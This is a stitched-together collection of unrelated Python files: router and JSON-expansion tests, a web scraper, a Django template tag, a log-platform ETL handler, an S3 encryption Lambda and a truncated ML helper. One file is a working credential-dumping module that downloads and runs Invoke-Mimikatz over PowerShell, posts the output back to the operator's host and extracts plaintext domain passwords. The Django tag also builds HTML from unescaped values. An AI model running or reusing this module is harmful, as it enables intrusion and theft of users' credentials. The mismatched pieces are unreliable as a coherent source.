movies.json for each actor with all of that actor's movie data?
You might initially have thought that we would do:
leaf_nodes=[{"/root/actors/.*": ["/[^/]+/movies/.*"]}]
But we have already established that is equivalent to:
leaf_nodes=["/root/actors/.*/movies/.*"]
We will stop recursion at each movie but everything else will be
done as normal (i.e. - file per dict/list).
Or maybe you would consider:
leaf_nodes=["/root/actors/.*", "/root/actors/.*/movies/.*"]
or:
leaf_nodes=["/root/actors/.*/movies/.*", "/root/actors/.*"]
But that won't work because "/root/actors/.*" will stop recursion
before paths matching "/root/actors/.*/movies/.*" are seen.
Remember: All regexes are checked for each path & the first one
matching stops recursion.
This is what we will do:
[
{
"/root/actors/.*": [
"/[^/]+/movies/.*",
"<A:/.*"
]
}
]
The key of the nested expression ("/root/actors/.*") tells expand
start a new JsonExpandOMatic recursion and save the resulting
"mangled" data as {actor}.json when that recursion completes.
That's normal nested behavior and during normal nested behavior
of "/[^/]+/movies/.*" expand would create {movie}.json but expand
any other dict/list found for the actor.
The '<A:' prefix, however, alters the behavior for those paths that
are matched by the expression "/.*". This expression will be applied
after (A) recursion and the result included (<) in their parent.
"""
JsonExpandOMatic(path=tmpdir).expand(
test_data,
root_element="root",
preserve=False,
leaf_nodes=[{"/root/actors/.*": ["/[^/]+/movies/.*", "<A:/.*"]}],
)
# This is the same thing you would expect in the non-nested case.
self._assert_root(tmpdir)
self._assert_actors(tmpdir)
# Unlike the non-nested case with regex "/root/actors/.*", the nested case
# will have a directory per actor.
# See the discussion in test_nested1_equivalency on why this is.
self._assert_actor_dirs(tmpdir)
# The nested "/[^/]+/movies/.*" gives us a file-per-movie
self._assert_movies(tmpdir)
assert os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/movies/modern_times.json")
assert os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson/movies/0.json")
# TODO: Explain these assertions
assert not os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/spouses.json")
assert not os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/spouses")
assert not os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/spouses/lita_grey.json")
assert not os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/spouses/lita_grey")
assert not os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/spouses/lita_grey/children.json")
assert not os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson/hobbies.json")
assert not os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson/hobbies")
with open(f"{tmpdir}/root/actors/charlie_chaplin.json") as f:
data = json.load(f)
assert data.get("spouses", None)
assert data.get["spouses"].get("lita_grey", None)
assert data.get["spouses"]["lita_grey"].get("children", None)
def _actors_test(self, tmpdir, test_data, original_data, regex):
expanded = JsonExpandOMatic(path=tmpdir).expand(
test_data, root_element="root", preserve=False, leaf_nodes=[regex]
)
# preserve=True allows mangling of test_data by expand()
assert test_data != original_data
# expand() returns a new representation of `data`
assert expanded == {"root": {"$ref": f"{tmpdir.basename}/root.json"}}
def _not(x):
return not x
# We expect to have the root and actors elements fully represented.
# Our leaf-node regex (/root/actors/.*) tells expand to create a
# per-actor file but not the per-actor directory or anything below that.
self._assert_root(tmpdir)
self._assert_actors(tmpdir)
self._assert_actor_dirs(tmpdir, f=_not)
self._assert_movies(tmpdir, f=_not)
def _charlie_test(self, tmpdir, test_data, original_data, regex):
expanded = JsonExpandOMatic(path=tmpdir).expand(
test_data, root_element="root", preserve=False, leaf_nodes=[regex]
)
assert expanded == {"root": {"$ref": f"{tmpdir.basename}/root.json"}}
self._assert_root(tmpdir)
self._assert_actors(tmpdir)
# No recursion for Charlie Chaplin
assert not os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin")
# Typical recursion for Dwayne Johnson
assert os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson")
assert os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson/movies")
# etc...
def _assert_root(self, tmpdir):
# This is the wrapper around the original data
assert os.path.exists(f"{tmpdir}/root.json")
assert os.path.exists(f"{tmpdir}/root")
def _assert_actors(self, tmpdir):
# Now we look at the original data's files
assert os.path.exists(f"{tmpdir}/root/actors.json")
# A file for each actor
assert os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin.json")
assert os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson.json")
def _assert_actor_dirs(self, tmpdir, f=lambda x: x):
# Now we look at the original data's files
assert os.path.exists(f"{tmpdir}/root/actors.json")
# A file for each actor
assert os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin.json")
assert os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson.json")
# A directory for each actor
assert f(os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin"))
assert f(os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson"))
def _assert_movies(self, tmpdir, f=lambda x: x):
assert f(os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/movies.json"))
assert f(os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/movies"))
assert f(os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson/movies.json"))
assert f(os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson/movies"))
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import unittest
from proton import Message
from proton.handlers import MessagingHandler
from proton.reactor import Container
from system_test import TestCase, Qdrouterd, main_module, TIMEOUT
# ====================================================
# Helper classes for all tests.
# ====================================================
# Named timers allow test code to distinguish between several
# simultaneous timers, going off at different rates.
class Timeout:
def __init__(self, parent, name):
self.parent = parent
self.name = name
def on_timer_task(self, event):
self.parent.timeout(self.name)
# ================================================================
# Setup
# ================================================================
class TopologyAdditionTests (TestCase):
@classmethod
def setUpClass(cls):
super(TopologyAdditionTests, cls).setUpClass()
def router(name, more_config):
config = [('router', {'mode': 'interior', 'id': name}),
('address', {'prefix': 'closest', 'distribution': 'closest'}),
('address', {'prefix': 'balanced', 'distribution': 'balanced'}),
('address', {'prefix': 'multicast', 'distribution': 'multicast'})
] \
+ more_config
config = Qdrouterd.Config(config)
cls.routers.append(cls.tester.qdrouterd(name, config, wait=True))
cls.routers = []
client_ports = dict()
client_ports['A'] = cls.tester.get_port()
client_ports['B'] = cls.tester.get_port()
client_ports['C'] = cls.tester.get_port()
client_ports['D'] = cls.tester.get_port()
cls.inter_router_ports = dict()
cls.inter_router_ports['A'] = cls.tester.get_port()
cls.inter_router_ports['B'] = cls.tester.get_port()
initial_cost = 10
lower_cost = 8
higher_cost = 12
# Only routers A and B are set up initially by this class.
# Routers C and D are started by the test itself.
router_A_config = [
('listener',
{'port': client_ports['A'],
'role': 'normal',
'stripAnnotations': 'no'
}
),
('listener',
{'role': 'inter-router',
'port': cls.inter_router_ports['A']
}
)
]
router_B_config = [
('listener',
{'port': client_ports['B'],
'role': 'normal',
'stripAnnotations': 'no'
}
),
('listener',
{'role': 'inter-router',
'port': cls.inter_router_ports['B'],
'stripAnnotations': 'no'
}
),
('connector',
{'name': 'AB_connector',
'role': 'inter-router',
'port': cls.inter_router_ports['A'],
'cost': initial_cost,
'stripAnnotations': 'no'
}
)
]
router('A', router_A_config)
router('B', router_B_config)
router_A = cls.routers[0]
router_B = cls.routers[1]
router_A.wait_router_connected('B')
cls.A_addr = router_A.addresses[0]
cls.B_addr = router_B.addresses[0]
# The two connections that this router will make, AC and BC,
# will be lower cost than the direct AB route that the network
# already has.
cls.router_C_config = [
('listener',
{'port': client_ports['C'],
'role': 'normal',
'stripAnnotations': 'no'
}
),
('connector',
{'name': 'AC_connector',
'role': 'inter-router',
'port': cls.inter_router_ports['A'],
'cost': int(lower_cost / 2),
'stripAnnotations': 'no',
'linkCapacity' : 1000
}
),
('connector',
{'name': 'BC_connector',
'role': 'inter-router',
'port': cls.inter_router_ports['B'],
'cost': int(lower_cost / 2),
'stripAnnotations': 'no',
'linkCapacity' : 1000
}
)
]
# The two connections that this router will make, AD and BD,
# will be higher cost than the other paths the networks already has
# available to get from A to B.
cls.router_D_config = [
('listener',
{'port': client_ports['D'],
'role': 'normal',
'stripAnnotations': 'no'
}
),
('connector',
{'name': 'AD_connector',
'role': 'inter-router',
'port': cls.inter_router_ports['A'],
'cost': int(higher_cost / 2),
'stripAnnotations': 'no',
'linkCapacity' : 1000
}
),
('connector',
{'name': 'BD_connector',
'role': 'inter-router',
'port': cls.inter_router_ports['B'],
'cost': int(higher_cost / 2),
'stripAnnotations': 'no',
'linkCapacity' : 1000
}
)
]
# This method allows test code to add new routers during the test,
# rather than only at startup like A and B above.
def addRouter(self, name, more_config) :
config = [('router', {'mode': 'interior', 'id': name}),
('address', {'prefix': 'closest', 'distribution': 'closest'}),
('address', {'prefix': 'balanced', 'distribution': 'balanced'}),
('address', {'prefix': 'multicast', 'distribution': 'multicast'})
] \
+ more_config
config = Qdrouterd.Config(config)
TopologyAdditionTests.routers.append(TopologyAdditionTests.tester.qdrouterd(name, config, wait=True))
def test_01_new_route_low_cost(self):
# During the test, test code will add a new router C,
# connecting A and B with new low-cost links. At that
# point the test's messages should switch from using
# route AB to using route ACB.
# By passing both of these routes to the test, I tell
# it to expect both of them to be used.
# If it terminates with the second path remaining unused
# it will fail.
#
# Since this test alters the path that the messages follow,
# it is OK for some messages to be released rather than
# delivered. It doesn't always happen - depends on timing.
initial_expected_trace = ['0/A', '0/B']
final_expected_trace = ['0/A', '0/C', '0/B']
released_ok = True
test = AddRouter(self.A_addr,
self.B_addr,
"closest/01",
self,
'C',
self.router_C_config,
[initial_expected_trace, final_expected_trace],
released_ok
)
test.run()
self.assertIsNone(test.error)
def test_02_new_route_high_cost(self):
# During the test, test code will add a new router D,
# connecting A and B with new links. But the links are
# higher cost than what already exist. The network should
# ignore them and keep using the lowest cost route that it
# already has.
# We communicate this expectation to the test by sending
# it a single expected trace. The test will fail with
# error if any other traces are encountered.
#
# Since this test does not alter the path that the messages
# follow, it is *not* OK for any messages to be released
# rather than delivered.
only_expected_trace = ['0/A', '0/C', '0/B']
released_ok = False
test = AddRouter(self.A_addr,
self.B_addr,
"closest/02",
self,
'D',
self.router_D_config,
[only_expected_trace],
released_ok
)
test.run()
self.assertIsNone(test.error)
# ================================================================
# Tests
# ================================================================
# --------------------------------------------------------------
#
# First test
# ------------------
#
# Send some messages through the original A---B router network,
# Then change it to look like this:
#
# C
# / \
# / \
# / \
# / \
# A -------- B
#
# But the caller controls what costs are assigned to the two
# new links, so only the caller knows whether messages should
# start to flow through the new route ACB or not. It passes
# that knowledge in to us as a list of expected paths.
# This test's job is to make sure that all the expected paths
# get used by messages, and no others get used.
#
#
# Second test
# ------------------
#
# The triangular network from the first test still exists, and
# we will add to it a new router D which also connects A and B.
#
# C
# / \
# / \
# / \
# / \
# A -------- B
# \ /
# \ /
# \ /
# \ /
# D
# As in the first test, the caller tells us what routes ought
# to be followed, by putting them in the 'expected_traces' arg.
#
# --------------------------------------------------------------
class AddRouter (MessagingHandler):
def __init__(self,
send_addr,
recv_addr,
destination,
parent,
new_router_name,
new_router_config,
expected_traces,
released_ok
):
super(AddRouter, self).__init__(prefetch=100)
self.send_addr = send_addr
self.recv_addr = recv_addr
self.dest = destination
self.parent = parent
self.new_router_name = new_router_name
self.new_router_config = new_router_config
self.released_ok = released_ok
self.error = None
self.sender = None
self.receiver = None
self.n_messages = 30
self.n_sent = 0
self.n_received = 0
self.n_released = 0
self.n_accepted = 0
self.test_timer = None
self.send_timer = None
self.timeout_count = 0
self.reactor = None
self.container = None
self.finishing = False
# The parent sends us a list of the traces we
# ought to see on messages.
# Make a little data structure that
# will keep track of how many times each trace was seen.
self.expected_trace_counts = list()
for i in range(len(expected_traces)) :
self.expected_trace_counts.append([expected_traces[i], 0])
def run(self) :
Container(self).run()
# Close everything and allow the test to terminate.
def bail(self, reason_for_bailing) :
self.finishing = True
self.error = reason_for_bailing
self.receiver.close()
self.send_conn.close()
self.recv_conn.close()
self.test_timer.cancel()
self.send_timer.cancel()
# There are two timers. The 'test' timer should only expire if
# something has gone wrong, in which case it terminates the test.
# The 'send' timer expires frequently, and every time it goes off
# we send out a little batch of messages.
def timeout(self, name):
if self.finishing :
return
self.timeout_count += 1
if name == "test" :
self.bail("Timeout Expired: %d messages received, %d expected." % (self.n_received, self.n_messages))
elif name == "send" :
self.send()
self.send_timer = self.reactor.schedule(1, Timeout(self, "send"))
# At T+5, create the new router with link costs as
# specified by parent. We do it partway into the test
# so that some messages will flow through the original
# network, and some will flow through the network with
# the new router added.
if self.timeout_count == 5 :
self.parent.addRouter(self.new_router_name, self.new_router_config)
def on_start(self, event):
self.reactor = event.reactor
self.container = event.container
self.test_timer = self.reactor.schedule(TIMEOUT, Timeout(self, "test"))
self.send_timer = self.reactor.schedule(1, Timeout(self, "send"))
self.send_conn = event.container.connect(self.send_addr)
self.recv_conn = event.container.connect(self.recv_addr)
self.sender = event.container.create_sender(self.send_conn, self.dest)
self.receiver = event.container.create_receiver(self.recv_conn, self.dest)
self.receiver.flow(self.n_messages)
# ------------------------------------------------------------
# Sender Side
# ------------------------------------------------------------
def send(self):
if self.n_sent >= self.n_messages :
return
# Send little bursts of 3 messages every sender-timeout.
for _ in range(3) :
msg = Message(body=self.n_sent)
self.sender.send(msg)
self.n_sent += 1
if self.n_sent == self.n_messages :
return
# The caller of this tests decides whether it is OK or
# not OK to have some messages released during the test.
def on_released(self, event) :
if self.released_ok :
self.n_released += 1
self.check_count()
else :
self.bail("a message was released.")
def on_accepted(self, event) :
self.n_accepted += 1
self.check_count()
#
# Do the released plus the accepted messages add up to the number
# that were sent? If so, bail out with success.
# Do NOT end the test if the number is still shy of the expected
# total. The callers of this method just call it every time they
# get something -- it will be called many times poer test.
#
# Pleae Note:
# This check is on the 'sender' side of this test, rather than the
# 'receiver' side, because it is to the sender that we make a
# guarantee: namely, that the sender should know the disposition of
# all sent messages -- whether they have been accepted by the receiver,
# or released by the router network.
#
def check_count(self) :
if self.n_accepted + self.n_released == self.n_messages :
self.finishing = True
self.finish_test()
# ------------------------------------------------------------
# Receiver Side
# ------------------------------------------------------------
def on_message(self, event):
if self.finishing :
return
self.n_received += 1
trace = event.message.annotations['x-opt-qd.trace']
# Introduce flaws for debugging.
# if self.n_received == 13 :
# trace = [ '0/B', '0/A', '0/D' ]
# if self.n_received == 13 :
# self.n_received -= 1
self.record_trace(trace)
self.check_count()
# Compare the trace that came from a message to the list of
# traces the caller told us to expect. If it is one of the
# expected traces, count it. Otherwise, fail the test.
def record_trace(self, observed_trace):
for trace_record in self.expected_trace_counts :
trace = trace_record[0]
if observed_trace == trace :
trace_record[1] += 1
return
# If we get here, the trace is one we were not expecting. That's bad.
self.bail("Unexpected trace: %s" % observed_trace)
# Shut down everything and make sure that all of the extected traces
# have been seen.
def finish_test(self) :
self.test_timer.cancel()
self.send_timer.cancel()
for trace_record in self.expected_trace_counts :
count = trace_record[1]
# Deliberate flaw for debugging.
# count = 0
if count <= 0 :
self.bail("Trace %s was not seen." % trace_record[0])
return
# success
self.bail(None)
if __name__ == '__main__':
unittest.main(main_module())
|
import re
import os
from scrapy.spider import BaseSpider
from scrapy.selector import HtmlXPathSelector
from scrapy.http import Request, HtmlResponse
from scrapy.utils.response import get_base_url
from scrapy.utils.url import urljoin_rfc
from urllib import urlencode
import csv
from product_spiders.items import Product, ProductLoader
HERE = os.path.abspath(os.path.dirname(__file__))
class LuckyVitaminSpider(BaseSpider):
name = 'luckyvitamin.com'
allowed_domains = ['www.luckyvitamin.com', 'luckyvitamin.com']
start_urls = ('http://luckyvitamin.com/brands',)
def __init__(self, *args, **kwargs):
super(LuckyVitaminSpider, self).__init__(*args, **kwargs)
def parse(self, response):
if not isinstance(response, HtmlResponse):
return
hxs = HtmlXPathSelector(response)
# brands
brands = hxs.select(u'//ul[@class="alpha-categories"]//a/@href').extract()
for url in brands:
url = urljoin_rfc(get_base_url(response), url)
yield Request(url)
# pages
next_page = hxs.select(u'//li[@class="pagingArrow"]/a/@href').extract()
if next_page:
next_page = urljoin_rfc(get_base_url(response), next_page[0])
yield Request(next_page)
for product in self.parse_product(response):
yield product
def parse_product(self, response):
if not isinstance(response, HtmlResponse):
return
hxs = HtmlXPathSelector(response)
products = hxs.select(u'//ul[@class="product-list"]/li')
for product in products:
product_loader = ProductLoader(item=Product(), selector=product)
url = product.select(u'.//div[@class="listItemLink"]/a/@href').extract()[0]
url = urljoin_rfc(get_base_url(response), url)
product_loader.add_value('url', url)
name = product.select(u'.//div[@class="listBrand"]/text()').extract()[0]
name += ' ' + product.select(u'.//div[@class="listItemLink"]/a/text()').extract()[0]
name += ' ' + product.select(u'.//div[@class="listData"]/text()').extract()[0]
product_loader.add_value('name', name)
product_loader.add_xpath('price', u'.//span[@class="salePrice"]/span/text()',
re=u'\$(.*)')
yield product_loader.load_item()
|
from django import template
from django.conf import settings
from images.models import Image
register = template.Library()
@register.simple_tag
def insert_image(id, class_names):
image = Image.objects.get(id=id)
return f"<img src='{settings.MEDIA_ROOT}/{image.file}' class='{class_names}' alt='{image.alt_tag}'>"
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-LOG 蓝鲸日志平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-LOG 蓝鲸日志平台 is licensed under the MIT License.
License for BK-LOG 蓝鲸日志平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import arrow
from django.utils.translation import ugettext_lazy as _
from django.db import transaction
from django.conf import settings
from apps.constants import UserOperationTypeEnum, UserOperationActionEnum
from apps.log_databus.exceptions import (
CollectorConfigNotExistException,
EtlParseTimeFormatException,
EtlStorageUsedException,
CollectorActiveException,
)
from apps.log_databus.handlers.etl_storage import EtlStorage
from apps.log_databus.tasks.bkdata import async_create_bkdata_data_id
from apps.log_databus.models import CollectorConfig, StorageCapacity, StorageUsed
from apps.log_search.handlers.index_set import IndexSetHandler
from apps.log_search.models import Scenario, ProjectInfo
from apps.log_search.constants import FieldDateFormatEnum
from apps.models import model_to_dict
from apps.utils.db import array_group
from apps.log_databus.handlers.storage import StorageHandler
from apps.log_databus.constants import REGISTERED_SYSTEM_DEFAULT
from apps.decorators import user_operation_record
from apps.utils.local import get_request_username
class EtlHandler(object):
def __init__(self, collector_config_id=None):
super().__init__()
self.collector_config_id = collector_config_id
self.data = None
if collector_config_id:
try:
self.data = CollectorConfig.objects.get(collector_config_id=self.collector_config_id)
except CollectorConfig.DoesNotExist:
raise CollectorConfigNotExistException()
def check_es_storage_capacity(self, cluster_info, storage_cluster_id):
if self.data.table_id:
return
es_storage_capacity = int(settings.ES_STORAGE_CAPACITY)
register_system = cluster_info["cluster_config"].get("registered_system")
if es_storage_capacity > 0 and register_system == REGISTERED_SYSTEM_DEFAULT:
biz_storage = StorageCapacity.objects.filter(bk_biz_id=self.data.bk_biz_id).first()
biz_storage_used = StorageUsed.objects.filter(
bk_biz_id=self.data.bk_biz_id, storage_cluster_id=storage_cluster_id
).first()
if biz_storage and biz_storage_used:
storage = biz_storage.storage_capacity
storage_used = biz_storage_used.storage_used
if storage > 0:
if storage_used >= storage:
raise EtlStorageUsedException()
def update_or_create(
self,
etl_config,
table_id,
storage_cluster_id,
retention,
allocation_min_days,
view_roles,
etl_params=None,
fields=None,
):
# 停止状态下不能编辑
if self.data and not self.data.is_active:
raise CollectorActiveException()
# 存储集群信息
cluster_info = StorageHandler(storage_cluster_id).get_cluster_info_by_id()
self.check_es_storage_capacity(cluster_info, storage_cluster_id)
is_add = False if self.data.table_id else True
# 1. meta-创建/修改结果表
etl_storage = EtlStorage.get_instance(etl_config=etl_config)
etl_storage.update_or_create_result_table(
self.data,
table_id=table_id,
storage_cluster_id=storage_cluster_id,
retention=retention,
allocation_min_days=allocation_min_days,
fields=fields,
etl_params=etl_params,
es_version=cluster_info["cluster_config"]["version"],
hot_warm_config=cluster_info["cluster_config"].get("custom_option", {}).get("hot_warm_config"),
)
# 2. 创建索引集
index_set = self._update_or_create_index_set(etl_config, storage_cluster_id, view_roles)
# 创建数据平台data_id及更新时
async_create_bkdata_data_id.delay(self.data.collector_config_id)
# add user_operation_record
operation_record = {
"username": get_request_username(),
"biz_id": self.data.bk_biz_id,
"record_type": UserOperationTypeEnum.ETL,
"record_object_id": self.data.collector_config_id,
"action": UserOperationActionEnum.CREATE if is_add else UserOperationActionEnum.UPDATE,
"params": {
"etl_config": etl_config,
"table_id": table_id,
"storage_cluster_id": storage_cluster_id,
"retention": retention,
"allocation_min_days": allocation_min_days,
"view_roles": view_roles,
"etl_params": etl_params,
"fields": fields,
},
}
user_operation_record.delay(operation_record)
return {
"collector_config_id": self.data.collector_config_id,
"collector_config_name": self.data.collector_config_name,
"etl_config": etl_config,
"index_set_id": index_set["index_set_id"],
"scenario_id": index_set["scenario_id"],
"storage_cluster_id": storage_cluster_id,
"retention": retention,
}
def etl_preview(self, etl_config, etl_params, data):
etl_storage = EtlStorage.get_instance(etl_config=etl_config)
fields = etl_storage.etl_preview(data, etl_params)
return {"fields": fields}
def etl_time(self, time_format, time_zone, data):
"""
时间解析
"""
fmts = array_group(FieldDateFormatEnum.get_choices_list_dict(), "id", True)
fmt = fmts.get(time_format)
if len(data) != len(fmt["description"]):
raise EtlParseTimeFormatException()
if time_format in ["epoch_second", "epoch_millis", "epoch_micros"]:
epoch_second = str(data)[0:10]
else:
try:
epoch_second = arrow.get(data, fmt["name"], tzinfo=f"GMT{time_zone}").timestamp
except Exception:
raise EtlParseTimeFormatException()
return {"epoch_millis": f"{epoch_second}000"}
@transaction.atomic()
def _update_or_create_index_set(self, etl_config, storage_cluster_id, view_roles=None):
"""
创建索引集
"""
# view_roles的来源
indexes = [
{
"bk_biz_id": self.data.bk_biz_id,
"result_table_id": self.data.table_id,
"result_table_name": self.data.collector_config_name,
"time_field": "dtEventTimeStamp",
}
]
index_set_name = _("[采集项]") + self.data.collector_config_name
if self.data.index_set_id:
index_set_handler = IndexSetHandler(index_set_id=self.data.index_set_id)
if not view_roles:
view_roles = index_set_handler.data.view_roles
index_set = index_set_handler.update(
index_set_name=index_set_name, view_roles=view_roles, category_id=self.data.category_id, indexes=indexes
)
else:
project_id = ProjectInfo.objects.filter(bk_biz_id=self.data.bk_biz_id).first().project_id
if not view_roles:
view_roles = []
index_set = IndexSetHandler.create(
index_set_name=index_set_name,
project_id=project_id,
storage_cluster_id=storage_cluster_id,
scenario_id=Scenario.LOG,
view_roles=view_roles,
indexes=indexes,
category_id=self.data.category_id,
collector_config_id=self.collector_config_id,
)
self.data.index_set_id = index_set.index_set_id
self.data.etl_config = etl_config
self.data.save()
return model_to_dict(index_set)
|
#!/usr/bin/env python
import logging
import os
import boto3
from botocore.exceptions import ClientError
logging.getLogger('boto3').setLevel(logging.CRITICAL)
logging.getLogger('botocore').setLevel(logging.CRITICAL)
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
def lambda_handler(event, context):
s3client = boto3.client('s3')
buckets = s3client.list_buckets()['Buckets']
for bucketObj in buckets:
bucketName = bucketObj['Name']
logger.info("working on: {}".format(bucketName))
# Does the bucket already have encryption?
try:
s3client.get_bucket_encryption(Bucket=bucketName)
logger.info("Skipping '{}', already encrypted!".format(bucketName))
continue
except ClientError as e:
if e.response['Error']['Code'] == 'ServerSideEncryptionConfigurationNotFoundError':
logger.info("Bucket is not encrypted: '{}' - Enabling default encryption".format(bucketName))
else:
print(e)
continue
# Does it have tags?
try:
tagsSet = s3client.get_bucket_tagging(Bucket=bucketName)['TagSet']
for key in tagsSet:
# Is there an explicit tag to stop callled 'X-StopAutoEncrypt'?
if key['Key'] == 'X-StopAutoEncrypt':
logger.info("Due to tags, excluding bucket '{}'".format(bucketName))
continue
except ClientError as e:
if e.response['Error']['Code'] == 'NoSuchTagSet':
pass # continue onwards, no tags!
else:
print(e)
continue
s3client.put_bucket_encryption(
Bucket=bucketName,
ServerSideEncryptionConfiguration={
'Rules': [
{
'ApplyServerSideEncryptionByDefault': {
'SSEAlgorithm': 'AES256',
}
}
]
}
)
# Rough count all the objects (don't paginate on purpose)
r = s3client.list_objects_v2(Bucket=bucketName)
if r['IsTruncated']:
count = "1000+"
else:
count = r['KeyCount']
# Send a helpful message to the SNS Topic
snsclient = boto3.client('sns')
subj = "(!!): Enabled Encryption on '{}'".format(bucketName)
snsclient.publish(
TopicArn=os.getenv('SNSNotifyArn'),
# 100 char limit
Subject=(subj[:98] + '..') if len(subj) > 100 else subj,
Message="Bucket '{}' was automatically encrypted, there were {} items that are [maybe] not encrypted.".format(bucketName, count)
)
|
from core.helpers import create_ps_command, obfs_ps_script, gen_random_string
from datetime import datetime
from StringIO import StringIO
class CMEModule:
'''
Executes PowerSploit's Invoke-Mimikatz.ps1 script
Module by @byt3bl33d3r
'''
name = 'Mimikatz'
def options(self, context, module_options):
'''
COMMAND Mimikatz command to execute (default: 'sekurlsa::logonpasswords')
'''
self.mimikatz_command = 'privilege::debug sekurlsa::logonpasswords exit'
if module_options and 'COMMAND' in module_options:
self.mimikatz_command = module_options['COMMAND']
#context.log.debug("Mimikatz command: '{}'".format(self.mimikatz_command))
self.obfs_name = gen_random_string()
def on_admin_login(self, context, connection):
payload = '''
IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/Invoke-Mimikatz.ps1');
$creds = Invoke-{func_name} -Command '{command}';
$request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/');
$request.Method = 'POST';
$request.ContentType = 'application/x-www-form-urlencoded';
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
$request.ContentLength = $bytes.Length;
$requestStream = $request.GetRequestStream();
$requestStream.Write( $bytes, 0, $bytes.Length );
$requestStream.Close();
$request.GetResponse();'''.format(server=context.server,
port=context.server_port,
addr=context.localip,
func_name=self.obfs_name,
command=self.mimikatz_command)
context.log.debug('Payload: {}'.format(payload))
payload = create_ps_command(payload)
connection.execute(payload)
context.log.success('Executed payload')
def on_request(self, context, request):
if 'Invoke-Mimikatz.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
with open('data/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1', 'r') as ps_script:
ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
request.wfile.write(ps_script)
else:
request.send_response(404)
request.end_headers()
def on_response(self, context, response):
response.send_response(200)
response.end_headers()
length = int(response.headers.getheader('content-length'))
data = response.rfile.read(length)
#We've received the response, stop tracking this host
response.stop_tracking_host()
#No reason to parse for passwords if we didn't run the default command
if 'sekurlsa::logonpasswords' in self.mimikatz_command:
buf = StringIO(data).readlines()
plaintext_creds = []
i = 0
while i < len(buf):
if ('Password' in buf[i]) and ('(null)' not in buf[i]):
passw = buf[i].split(':')[1].strip()
domain = buf[i-1].split(':')[1].strip().upper()
user = buf[i-2].split(':')[1].strip().lower()
#Dont parse machine accounts
if not user[-1:] == '$':
context.db.add_credential('plaintext', domain, user, passw)
plaintext_creds.append('{}\\{}:{}'.format(domain, user, passw))
i += 1
if plaintext_creds:
context.log.success('Found plain text credentials (domain\\user:password)')
for cred in plaintext_creds:
context.log.highlight(cred)
log_name = 'Mimikatz-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
with open('logs/' + log_name, 'w') as mimikatz_output:
mimikatz_output.write(data)
context.log.info("Saved Mimikatz's output to {}".format(log_name))
|
"""Calculate Functions"""
# Authors: Jeffrey Wang
# License: BSD 3 clause
import numpy as np
def calculate_batch(batch_size, length):
"""
Calculate the batch size for the data of given length.
Parameters
----------
batch_size : int, float, default=None
Batch size for training. Must be one of:
- int : Use `batch_size`.
- float : Use `batch_size * n_samples`.
- None : Use `n_samples`.
length : int
Length of the data to be batched.
Returns
-------
batch : int
Actual batch size.
"""
if batch_size is None : return length
elif isinstance(batch_size, int) and batch_size > 0 and \
batch_size <= length:
return batch_size
elif isinstance(batch_size, float) and 0 < batch_size <= 1:
return int(batch_size * length)
else:
raise ValueError("Batch size must be None, an int less than %d," % length,
"or a float within (0,1]")
def calculate_weight(Y, n_classes, class_weight=None, weights=None):
"""
Calculate the weights applied to the predicted labels,
combining class weights and sample weights.
Parameters
----------
Y : array-like, shape=(n_samples,)
Target labels as integers.
n_classes : int
Number of classes.
class_weight : dict, 'balanced', or None, default=None
Weights associated with classes in the form
`{class_label: weight}`. Must be one of:
- None : All classes have a weight of one.
- 'balanced': Class weights are automatically calculated as
